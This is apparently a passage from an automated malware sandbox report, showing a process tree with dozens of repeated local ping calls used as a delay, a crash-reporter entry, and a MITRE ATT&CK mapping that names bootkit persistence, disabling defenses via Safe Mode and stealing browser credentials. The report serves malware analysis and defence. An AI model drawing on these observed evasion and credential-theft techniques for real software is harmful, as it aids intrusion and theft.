  ping 127.0.0.1 -n 1
  2⤵
  PID:12400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12508
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12908
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12944
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12992
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13188
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13436
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13900
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3700
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7552
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7392 -ip 7392
1⤵
PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

Safe Mode Boot

T1562.009

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion